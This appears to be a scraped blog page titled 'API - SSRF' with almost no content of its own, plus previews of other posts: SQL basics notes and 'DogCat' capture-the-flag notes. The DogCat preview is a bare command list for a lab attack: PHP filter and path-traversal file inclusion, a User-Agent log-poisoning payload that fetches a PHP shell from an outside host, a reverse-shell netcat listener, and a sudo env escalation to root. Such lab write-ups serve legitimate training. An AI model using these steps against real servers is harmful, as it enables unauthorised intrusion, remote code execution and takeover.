API - SSRF

 Server Side Request Forgery (SSRF)








App - 2













Comments

Post a Comment

Popular posts from this blog

SQL Basics | Shahul Hameed

Image
  SQL _Queries   Resource: https://balanced-quince-db1.notion.site/SQL-7347f5956fe347f887b4132c716cd236#17bc403a1add453db519621da47c1de3 Database queries CREATE DATABASE LOGICFIRST; -- creates a new database -- TO DELETE A DATABASE DROP DATABASE LOGICFIRST; DROP SCHEMA LOGICFIRST; -- same as above. u can use DATABASE Or SCHEMA DROP SCHEMA IF EXISTS LOGICFIRST; -- prevents error if db not found   SHOW DATABASES; -- shows all the databases SHOW SCHEMAS; -- same as above. shows schemas/db   USE SYS; -- uses this database for all further commands SHOW TABLES;-- shows all tables in the database being used Table - Create,Delete,Alter primary key - uniquely identifies a row in a table //creating a table CREATE TABLE student(                id INT PRIMARY KEY,     name VARCHAR(30),     gpa DECIMAL(3,2) ); -- ----or----- CREATE ...
Read more

DogCat

http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=index http://10.10.120.68/?view=php://filter/convert.base64-encode/cat/resource=flag view-source:http://10.10.120.68/?view=../../../../etc/cat/../passwd&ext= view-source:http://10.10.120.68/?view=../../../../var/log/apache2/cat/../access.log&ext= https://toolbox.itsec.tamu.edu/ User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://10.8.135.218/shell.php'))?> Shell folder: cp /usr/share/webshells/php/php-reverse-shell.php . mv php-reverse-shell.php shell.php   cat shell.php //Make sure to modify the IP and port inside the shell file python -m http.server or 8081 rlwrap nc -lvnp 8888  find / -type f -name flag* 2>/dev/null //to find all flags Inside Shell: $ cd /var/www/html whoami id ls -la sudo -l sudo /usr/bin/env /bin/bash cd /root Final Flag: rlwrap nc -lvnp 8888   cd /opt/ cat backup.sh tar cf /root/container/backup/backup.tar /root/container sudo...
Read more